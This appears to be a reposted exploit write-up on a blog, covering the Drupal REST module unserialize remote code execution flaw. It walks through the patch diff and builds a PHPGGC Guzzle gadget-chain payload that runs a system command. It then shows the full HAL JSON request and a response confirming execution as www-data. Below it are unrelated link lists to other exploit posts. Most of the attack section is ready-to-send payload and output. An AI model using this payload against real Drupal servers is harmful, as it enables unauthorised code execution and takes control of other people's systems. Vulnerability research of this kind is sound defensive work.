Analyzing the patch

By diffing Drupal 8.6. and 8.6., we can see that in the REST module, FieldItemNormalizer now uses a new trait, SerializedColumnNormalizerTrait. This trait provides the checkForSerializedStrings() method, which in short raises an exception if a string is provided for a value that is stored as a serialized string. This indicates the exploitation vector fairly clearly: through a REST request, the attacker needs to send a serialized property. This property will later be unserialize()d, thing that can easily be exploited using tools such as PHPGGC. Another modified file gives indications as to which property can be used: LinkItem now uses unserialize($values['options'], ['allowed_classes' => FALSE]); instead of the standard unserialize($values['options']);.

As for all FieldItemBase subclasses, LinkItem references a property type. Shortcut uses this property type, for a property named link.

Triggering the unserialize()

Having all these elements in mind, triggering an unserialize is fairly easy:

GET /drupal-8.6./node/?_format=hal_json HTTP/1.1

Host: 192.168.1.25

Content-Type: application/hal+json

Content-Length: 

{

  "link": [

    {

      "value": "link",

      "options": "<SERIALIZED_CONTENT>"

    }

  ],

  "_links": {

    "type": {

      "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default"

    }

  }

}

Since Drupal  uses Guzzle, we can generate a payload using PHPGGC:

$ ./phpggc guzzle/rce1 system id --json

"O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"

We can now send the payload via GET:

GET /drupal-8.6./node/?_format=hal_json HTTP/1.1

Host: 192.168.1.25

Content-Type: application/hal+json

Content-Length: 

{

  "link": [

    {

      "value": "link",

      "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"

    }

  ],

  "_links": {

    "type": {

      "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default"

    }

  }

}

To which Drupal responds:

HTTP/1.1  OK

Link: <...>

X-Generator: Drupal  (https://www.drupal.org)

X-Drupal-Cache: MISS

Connection: close

Content-Type: application/hal+json

Content-Length: 

{...}uid=(www-data) gid=(www-data) groups=(www-data)

Note: Drupal caches responses: if you're in a testing environment, clear the cache. If not, try another node ID.

[EXP]Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution的更多相关文章

  1. [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution

    # Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...

  2. [EXP]Microsoft Windows CONTACT - Remote Code Execution

    [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3 ...

  3. [EXP]WordPress Core 5.0 - Remote Code Execution

    var wpnonce = ''; var ajaxnonce = ''; var wp_attached_file = ''; var imgurl = ''; var postajaxdata = ...

  4. [EXP]Apache Superset < 0.23 - Remote Code Execution

    # Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Auth ...

  5. [EXP]ThinkPHP 5.0.23/5.1.31 - Remote Code Execution

    # Exploit Title: ThinkPHP .x < v5.0.23,v5.1.31 Remote Code Execution # Date: -- # Exploit Author: ...

  6. [EXP]phpBB 3.2.3 - Remote Code Execution

    // All greets goes to RIPS Tech // Run this JS on Attachment Settings ACP page var plupload_salt = ' ...

  7. [EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  8. GTAC 2015将于11月10号和11号召开

    今年的GTAC注册已经结束,将会在11月10号和11号在Google马萨诸塞州剑桥办公室召开.大家可以关注https://developers.google.com/google-test-autom ...

  9. 【译】C++工程师需要掌握的10个C++11特性

    原文标题:Ten C++11 Features Every C++ Developer Should Use 原文作者:Marius Bancila 原文地址:codeproject 备注:非直译,带 ...

随机推荐

  1. 【笔记】计算机原理,网络,Linux操作系统

    一,计算机原理 1,化繁为简的思想,产生二进制,产生把所有计算归结为加法运算 二,网络 1,分层思想,产生ISO七层协议,商用了TCP/IP的五层协议 三,Linux操作系统 1,分层思想,硬件-&g ...

  2. MySQL 详细学习笔记

    Windows服务 -- 启动MySQL net start mysql -- 创建Windows服务 sc create mysql binPath= mysqld_bin_path(注意:等号与值 ...

  3. jfinal处理完html提交过来的数据,将处理信息返回给html页面。html根据返回值进行相应的处理

    1.前台jQuery代码: $.ajax({ url: "/admin/jcsjpz/syxmdy/RemoveSyxm", data: {data: id}, success: ...

  4. mysql 数据库设计

    数据库设计 需求分析 *1.用户模块 用于记录记录注册用户信息 包括属性:用户名,密码,电话,邮箱,身份证号,地址,姓名,昵称... 可选唯一标志属性:用户名,电话,身份证号 存储特点:随系统上线时间 ...

  5. 深入理解 requestAnimationFrame

    在Web应用中,实现动画效果的方法比较多,Javascript 中可以通过定时器 setTimeout 来实现,css3 可以使用 transition 和 animation 来实现,html5 中 ...

  6. spring mvc+mybatis 构建 cms + 实现UC浏览器文章功能

    最近公司在模拟UC浏览器做一个简单的cms系统,主要针对于企业内部的文章浏览需求,这边考虑用户大多用mobile浏览文章内容,故使用原生的ios和android进行开发,后面也会集成html5. 1. ...

  7. JSP内置对象application

    application对象实现了用户间数据的共享,可存放全局变量 application开始于服务器的启动,终止于服务器的关闭 在用户的前后连接或不同用户之间的连接中,可以对application对象 ...

  8. easy ui Uncaught Error: cannot call methods on tooltip prior to initialization; attempted to call method 'hide'

    今天bootstrap 和easy ui混用时候报了这么一个错误,本来可以点击编辑的,但是现在一点击就报错,

  9. valgrind内存检测工具

    valgrind 那点事 ---------------------------------------内存检测工具 valgrind要使用此工具,可以使用--tool=memcheck 在Valgr ...

  10. [solution] JZOJ-5781 秘密通道

    JZOJ-5781[秘密通道 ]solution 题面 Description 有一副$nm$的地图,有$nm$块地,每块是下列四种中的一种: 墙:用#表示,墙有4个面,分别是前面,后面,左面,右面. ...